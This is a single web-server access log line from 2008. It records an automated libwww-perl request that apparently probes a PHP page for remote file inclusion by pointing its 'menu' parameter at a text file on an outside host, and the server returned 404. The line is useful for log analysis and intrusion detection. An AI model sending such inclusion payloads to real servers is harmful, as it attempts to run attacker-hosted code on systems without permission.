64.13.254.125 - - [25/Mar/2008:07:17:36 -0700] "GET /logs/index1.php?menu=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
